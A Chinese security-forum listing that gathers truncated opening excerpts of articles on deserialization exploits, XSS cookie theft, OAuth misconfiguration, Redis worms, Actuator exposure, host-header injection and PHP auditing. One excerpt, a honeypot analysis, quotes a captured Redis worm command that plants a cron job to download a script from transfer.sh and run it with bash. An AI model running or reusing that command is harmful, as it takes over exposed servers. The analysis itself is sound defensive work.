本文分享一下defineClass在反序列化漏洞当中的使用场景,以及在exp构造过程中的一些使用技巧 0x00 前言 首先看一下defineClass的官方定义 众所周知,java编译器会将.java文件编译成jvm可以识别的机器代码保存在.class文件当中。正常情况下,java会先调用classLoader去加载.class文件,然后调用loadClass函数去加载对应的类名,返回一个Cla

原文地址:https://medium.com/@yassergersy/xss-to-session-hijack-6039e11e6a81 通过XSS窃取HttpOnly Cookie 你好 我写很少关于我发现,但我决定分享这些,这可能会帮助你,和POC。 首先说实话,我是最懒惰的黑客之一,我运行自己的脚本和常用工具,如wfuzz,sublister,nmap等,观看random电影,电影结束

前言: 老洞新谈,重复造属于自己的轮子 目录: 0x01:什么是OAuth2.0协议 0x02:配置不当所造成的危害 0x03:如何正确配置 什么是OAuth2.0协议 在OAuth协议还没有产生之前,如何我们想要登录一个网站,而这个网站又支持第三方登录,例如QQ登录。那么我们就只能在这个网站上输入QQ账号和密码,这个网站同时也就知道了我们的账号和密码,这势必会产生一些安全问题,而OAuth协议就

Catfish(鲶鱼) CMS 开源免费的PHP内容管理系统 不需要高深专业技术轻松搭建网站 使用简单 灵活方便 稳定快捷 风格切换 想换就换 适应不同需求 最新版本:V 4.7.21 http://www.catfish-cms.com/ 分析 文件在 \application\index\controller\Index.php 评论处存在xss public function pingl

原文:https://www.imperva.com/blog/2018/04/deep-dive-database-attacks-part-iv-delivery-and-execution-of-malicious-executables-mysql/ 在上一篇文章中,我们为读者详细介绍了通过Microsoft SQL Server执行SQL和OS命令的各种技术,攻击者可以利用这些技术在目

0x00 INFO 蜜罐捕获的Redis蠕虫,样本文件在VT上并未报异常。 0x01 Payload 从Redis的日志中捕获到如下命令: "set" "Backup2" "\t\n*/5 * * * * wget -O .cmd https://transfer.sh/TSAm0/tmp.aLCyXcGXsL && bash .cmd\n\t" 可以看到攻击者从 https:

SpringBoot应用监控Actuator使用的安全隐患 概述 微服务作为一项在云中部署应用和服务的新技术是当下比较热门话题,而微服务的特点决定了功能模块的部署是分布式的,运行在不同的机器上相互通过服务调用进行交互,业务流会经过多个微服务的处理和传递,在这种框架下,微服务的监控显得尤为重要。 而Actuator正是Spring Boot提供的对应用系统的监控和管理的集成功能,可以查看应用配置的详

一.开始前的思考 1.我真的喜欢搞安全吗? 2.我只是想通过安全赚钱钱吗? 3.我不知道做什么就是随便。 4.一辈子做信息安全吗 这些不想清楚会对你以后的发展很不利,与其盲目的学习web安全,不如先做一个长远的计划。否则在我看来都是浪费时间。如果你考虑好了参照我的计划进行学习,我不敢保证你实践完多牛逼,但是找5k-8k的工作绝对不成问题。 1.目的 本问目的是带大家快速入门web安全,不会搞些虚

前言: 遇到个Host-header-injection,简单的查查资料,总结一下这方面的知识。 目录: 0x01:漏洞原理 0x02:黑盒测试 0x03:漏洞危害 0x04:如何修复 漏洞原理 在互联网上,大部分情况下一个web服务器,有着一个IP和多个网站。那么当我们向web服务器做出请求时,web服务器是如何识别到底是访问其中的哪个网站呢?这就是HOST存在的理由。 而当服务器获取HOS

这篇文章主要用于学习 RMI 的反序列化利用的流程原理,在网上搜了一大堆的 RMI 利用资料,大多仅仅是讲的利用方法,没有找到到底为啥能这么用,即使有些涉及到一些原理的文章,也写得过于高端了....看不大懂,只能自己去跟一根整个利用流程,请各位大佬轻喷.... 网上流传的基于报错回显的 payload 先抛出 rmi 反序列化的exp 本地: import org.apache.commons.

在Web中,session是认证用户身份的凭证,它具备如下几个特点: 用户不可以任意篡改 A用户的session无法被B用户获取 也就是说,session的设计目的是为了做用户身份认证。但是,很多情况下,session被用作了别的用途,将产生一些安全问题,我们今天就来谈谈“客户端session”(client session)导致的安全问题。 0x01 什么是客户端session 在传统PHP

随着代码安全的普及,越来越多的开发人员知道了如何防御sqli、xss等与语言无关的漏洞,但是对于和开发语言本身相关的一些漏洞和缺陷却知之甚少,于是这些点也就是我们在Code audit的时候的重点关注点。本文旨在总结一些在PHP代码中经常造成问题的点,也是我们在审计的时候的关注重点。(PS:本文也只是简单的列出问题,至于造成问题的底层原因未做详细解释,有兴趣的看官可以自行GOOGLE或者看看底层C

Author:vspiders 首发地址:http://blog.csdn.net/vspiders/article/details/79643200 前言 最近和小伙伴们一起研究了下PHP反序列化漏洞,突发奇想,利用反序列化漏洞写一个一句话木马效果应该蛮不错的。于是便有此文。 0x01 PHP反序列化 说起PHP反序列化,那必须先简单说一下PHP的序列化。PHP序列化是将一个对象、数组、字符

最近在微信群中看到有人分享了新的关于UDF提权的文章,在文章开头处提到了MySQL 5.7,之后群中又分享了社区中的译文版本,既然在开头处看到了MySQL的最新版本5.7.21,那么我不得不继续往下看。 原文地址:https://osandamalith.com/2018/02/11/mysql-udf-exploitation/ 译文版本:https://xianzhi.aliyun.com/f
